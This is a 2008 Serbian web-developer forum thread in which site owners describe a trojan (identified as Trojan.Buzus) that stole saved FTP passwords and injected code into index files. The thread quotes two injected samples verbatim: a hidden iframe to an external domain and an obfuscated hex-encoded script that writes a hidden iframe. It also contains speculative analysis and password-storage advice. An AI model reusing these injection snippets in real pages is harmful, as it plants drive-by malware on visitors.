PDA

Pogčedajte punu verziju : "Rasturio" me virus / trojanac


ppavlovic
09. 04. 2008., 01:10
Ne bih zeleo da se ovo nekom desi. :-(

Nekako sam zapatio trojanca koji ima tu osobinu da skupi FTP sifre koje su snimljene u nekom od FTP programa (u mom slucaju, radi se o Total Commanderu) i salje ih na neki udaljeni (zarazeni) racunar. U mom slucaju, to je jedno 100-tinak sajtova. :-(

Dalje, udaljeni racunar se kaci na FTP i preuzima fajlove koji imaju index u svom nazivu, bez obzira na ekstenziju. Lokalno na racunaru menja sadrzaj fajlova i na dnu dodaje

<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Ponekad stavlja komentar na postojece iframe tagove u tim fajlovima.
Posle toga uredno uploaduje taj fajl na FTP.
Ponekad se desi da ostavi fajl main.php koji je "klasicna" skripta za remote upravljanje sajtom.

Glavni problem je sto ovaj trojanac "ne radi" sve kako treba, tako da se desi da uploaduje isecen fajl ili da u potpunosti prepise sadrzaj *index*.* fajlova iframe kodom. A desilo se da se html fajl od jednog klijenta preseli kod drugog.

Da li se neko sretao sa necim slicnim?

nixa
09. 04. 2008., 01:15
au kako bih ja bio mrtav da se to meni desilo :) tj mozda i ne bih , ali imam osecaj da bi imao jako uznemiravajuce pozive

ivanhoe
09. 04. 2008., 02:26
kako se zove virus?

i kako provali passworde iz FTP programa, zar TC ne enkodira te podatke nekako ?

nixa
09. 04. 2008., 03:20
ma jok, cist text file

chux
09. 04. 2008., 08:09
pisao sam o tome u ovoj temi, zajebana stvar
http://www.devprotalk.com/showthread.php?t=4841&highlight=virus+koji

robi-bobi
09. 04. 2008., 09:08
brrrrr
odoh odmah da vidim imam li negde IKAKWE nekriptirane lozinke (mislim da ne)

kad smo kod toga, jel neko koristi neki password manager
jes da stavljas sva jaja u jedan kosh, al ako je taj kosh dobar, mozda je bolje no ono sto sad imamo: lozinke u Firefox, lozinke u FTP u Thunderbird itd ...

Dragan Babić
09. 04. 2008., 10:22
Yup, video sam nekoliko takvih primera. Doduse, nisu se meni licno desavali, ali su bili prisutni na projektima na kojima sam radio. U stvari lazem, jednom mi se nesto slicno desilo na DE kada je ubacio neki Top 50 Sites JS, Rusi neki majku im...

artur_dent
09. 04. 2008., 12:09
TC cuva sve FTP podatke u wcx_ftp.ini koji se nalazi u Windows direktorijumu.
Lozinke jesu kriptovane ali po broju programicica kojih ima za razbijanje i koliko malo vremena treba za to, enkripcija nije bog zna kako jaka.

ivanhoe
09. 04. 2008., 14:47
mislim da cu da krenem da kucam passworde umesto da ih snimam :(

misk0
09. 04. 2008., 14:53
mislim da cu da krenem da kucam passworde umesto da ih snimam :(

sa papirom pored stola?

ppavlovic
09. 04. 2008., 15:51
Uz Total Commander Ultima Prime dolazi fajl koji se lepo zove


DCE Generic clean: {PE_Generic, C:\Program Files\TC UP\PLUGINS\Tools\FtpPasswordRipper\Windows_Command er_FTP_Password_RIPPER.exe}


Imam program instaliran duze vreme, ali ga nisam koristio. E,sad ... recimo da sam ga jednom u skorije vreme sucajno pokrenuo. Necu jos prstom da upirem u njega.

BTW, nod32 nista ne kaze za doticni fajl, ali ga TrendMicro sysclean cisti.

artur_dent
09. 04. 2008., 15:51
Bolje na onaj postIT nalepljen na monitor, kao po drzavnim sluzbama i nekim bankama... sa sve korisnickim nalozima i paswordima... ;)

McKracken
09. 04. 2008., 16:00
roboform.com ... ekstra programce, nije skupo, a radi posao vrhunski.

ppavlovic
09. 04. 2008., 16:19
Identifikovan trojanac kao TROJ_BUZUS / Trojan.Buzus.
Info:

Trojan.Buzus opens a backdoor on the infected machine and tries to steal various information like personal financial data (like credit card numbers, online banking details etc.), passwords from various email and FTP applications (like Trillian, Microsoft Outlook, CuteFTP etc.) It also tries to compromise security settings of various security related products.
Kod mene bio u dva fajla, poaison.exe negde u temporary internet files i winvhelp.exe u \windows\system32

ivanhoe
09. 04. 2008., 16:35
sa papirom pored stola?

pa ja sljakam od kuce, tako da mu papirce dodje i najsigurnija varijanta... imam cak i psa, da brani podatke :)

twix
09. 04. 2008., 17:28
Ja recimo imam odštampane sve šifre, tako da takav problem ne može da se desi ;)

Dragan Babić
09. 04. 2008., 17:58
U mom slucaju (novootkriveno danas) su se sadrzaji index fajlova zamenjivali ovim kodom:

<script src="http://safe.google-signature.com/webanalytics.js"></script><script>function v47f5126c27ffd(v47f5126c28008){ function v47f5126c28014 () {return 16;} return(parseInt(v47f5126c28008,v47f5126c28014())); }function v47f5126c28048(v47f5126c2804e){ var v47f5126c28060=2; var v47f5126c28053='';for(v47f5126c28059=0; v47f5126c28059<v47f5126c2804e.length; v47f5126c28059+=v47f5126c28060){ v47f5126c28053+=(String.fromCharCode(v47f5126c27ff d(v47f5126c2804e.substr(v47f5126c28059, v47f5126c28060))));}return v47f5126c28053;} document.write(v47f5126c28048('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D626 1333537643531207372633D5C27687474703A2F2F75726C2F3 F272B4D6174682E726F756E64284D6174682E72616E646F6D2 8292A313634333733292B2733663235393862315C272077696 474683D353631206865696768743D323933207374796C653D5 C27646973706C61793A206E6F6E655C273E3C2F696672616D6 53E27293C2F5343524950543E'));</script>

Nemam pojma sta ovo radi.

bluesman
09. 04. 2008., 19:08
Koliko ja vidim na prvi pogled ovo preverava karaktere koje kucas na sajtu (verovatno ceka da ukucas password ) i onda salje na neki script na tom njegovom serveru koji dalje verovatno cuva koji je domen i koji je password...

a ovo function v47f5126c28014 () je "mracna fora" :) Ta funkcija vraca samo broj 16, koji onda sluzi za parseInt da vraca heksadecimalni broj. Stvarno ne znam zasto se toliko trudio da to zamaskira, pa umesto
parseInt (broj, 16)
pise
parseInt(v47f5126c28008,v47f5126c28014())

degojs
09. 04. 2008., 20:27
sa papirom pored stola?

Pa to je mnogo sigurnije nego da ih držiš u nekom fajlu - tako ipak neko mora fizički da dođe i uzme taj papir..

ivanhoe
09. 04. 2008., 22:18
Stvarno ne znam zasto se toliko trudio da to zamaskira, pa umesto
parseInt (broj, 16)
pise
parseInt(v47f5126c28008,v47f5126c28014())

verovatno se ime te funkcije generise slucajno, pa je onda ideja da time promeni signature skripti, ako neko (web hosting admin recimo) pokusa da grepuje trazeci zarazene sajtove.. mada slazem se da je glupo :)

LiquidBrain
10. 04. 2008., 16:15
Ima josh jedan lep open source programcic za passworde :)

http://keepass.info/

Cartman
17. 04. 2008., 09:07
mislim da cu da krenem da kucam passworde umesto da ih snimam :(

Bolja ti je varijanta da koristis program za enkripciju lozinki, ili sigurniji operativni sistem, jer trojanci jako cesto (skoro uvek) sadrze i keylogger tako da je kucanje sifara losija varijanta... :-/